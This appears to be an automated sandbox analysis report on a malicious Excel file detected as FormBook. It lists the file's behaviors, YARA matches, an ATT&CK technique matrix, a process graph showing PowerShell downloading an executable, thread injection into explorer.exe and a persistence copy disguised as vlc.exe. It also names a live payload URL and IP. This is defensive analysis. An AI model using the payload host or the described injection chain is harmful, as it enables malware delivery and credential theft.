          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management Instrumentation111Registry Run Keys / Startup Folder11Process Injection412Disable or Modify Tools11Credential API Hooking1File and Directory Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScripting2Boot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder11Deobfuscate/Decode Files or Information1Input Capture1System Information Discovery124Remote Desktop ProtocolCredential API Hooking1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsExploitation for Client Execution3Logon Script (Windows)Logon Script (Windows)Scripting2Security Account ManagerSecurity Software Discovery241SMB/Windows Admin SharesInput Capture1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsPowerShell3Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information31NTDSVirtualization/Sandbox Evasion5Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol22SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing3LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonRootkit1Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading111DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion5Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection412/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 323692 Sample: 5901777.xls Startdate: 27/11/2020 Architecture: WINDOWS Score: 100 45 Multi AV Scanner detection for domain / URL 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Antivirus detection for dropped file 2->49 51 12 other signatures 2->51 9 powershell.exe 14 21 2->9         started        14 powershell.exe 21 2->14         started        16 EXCEL.EXE 27 22 2->16         started        process3 dnsIp4 43 sparepartiran.com 162.223.88.131, 49743, 49744, 80 COLOUPUS United States 9->43 41 C:\Users\Public\oftmhayq.exe, PE32 9->41 dropped 61 Drops PE files to the user root directory 9->61 63 Powershell drops PE file 9->63 18 oftmhayq.exe 4 9->18         started        21 conhost.exe 9->21         started        23 oftmhayq.exe 1 5 14->23         started        26 conhost.exe 14->26         started        28 splwow64.exe 16->28         started        file5 signatures6 process7 file8 53 Antivirus detection for dropped file 18->53 55 Machine Learning detection for dropped file 18->55 57 Tries to detect virtualization through RDTSC time measurements 18->57 30 oftmhayq.exe 18->30         started        39 C:\Users\user\AppData\Roaming\...\vlc.exe, PE32 23->39 dropped 59 Injects a PE file into a foreign processes 23->59 33 oftmhayq.exe 23->33         started        signatures9 process10 signatures11 65 Modifies the context of a thread in another process (thread injection) 30->65 67 Maps a DLL or memory area into another process 30->67 69 Queues an APC in another process (thread injection) 30->69 35 explorer.exe 33->35 injected process12 process13 37 vlc.exe 35->37         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          5901777.xls24%VirustotalBrowse

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\oftmhayq.exe100%AviraHEUR/AGEN.1136389
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe100%AviraHEUR/AGEN.1136389
          C:\Users\Public\oftmhayq.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe100%Joe Sandbox ML

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          29.0.oftmhayq.exe.870000.0.unpack100%AviraHEUR/AGEN.1136389Download File
          25.2.oftmhayq.exe.fa0000.0.unpack100%AviraHEUR/AGEN.1136389Download File
          30.2.oftmhayq.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          29.2.oftmhayq.exe.870000.1.unpack100%AviraHEUR/AGEN.1136389Download File
          32.2.vlc.exe.70000.0.unpack100%AviraHEUR/AGEN.1136389Download File
          30.0.oftmhayq.exe.8a0000.0.unpack100%AviraHEUR/AGEN.1136389Download File
          29.2.oftmhayq.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          25.0.oftmhayq.exe.fa0000.0.unpack100%AviraHEUR/AGEN.1136389Download File
          24.0.oftmhayq.exe.7c0000.0.unpack100%AviraHEUR/AGEN.1136389Download File
          30.2.oftmhayq.exe.8a0000.1.unpack100%AviraHEUR/AGEN.1136389Download File
          24.2.oftmhayq.exe.7c0000.0.unpack100%AviraHEUR/AGEN.1136389Download File
          32.0.vlc.exe.70000.0.unpack100%AviraHEUR/AGEN.1136389Download File

          Domains

          SourceDetectionScannerLabelLink
          sparepartiran.com11%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://sparepartiran.com/js/2Q/50%Avira URL Cloudsafe
          http://www.fonts.comat0%Avira URL Cloudsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://sparepartiran.com11%VirustotalBrowse
          http://sparepartiran.com0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cnp0%Avira URL Cloudsafe
          http://www.sakkal.como0%Avira URL Cloudsafe
          http://www.ascendercorp.com/typedesigners.html:0%Avira URL Cloudsafe
          http://www.urwpp.deocS0%Avira URL Cloudsafe
          http://www.fontbureau.coma770%Avira URL Cloudsafe
          http://www.fontbureau.comldva0%Avira URL Cloudsafe
          https://contoso.com/0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          http://www.carterandcone.comR0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.founder.com.cn/cnn-u0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.sakkal.comc0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.urwpp.deX0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/0%URL Reputationsafe
          http://www.galapagosdesign.com/0%URL Reputationsafe
          http://www.galapagosdesign.com/0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://www.carterandcone.comegu0%Avira URL Cloudsafe
          https://go.micro0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          http://sparepartiran.com/js/2Q/5901777.pdf.exe0yRO0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
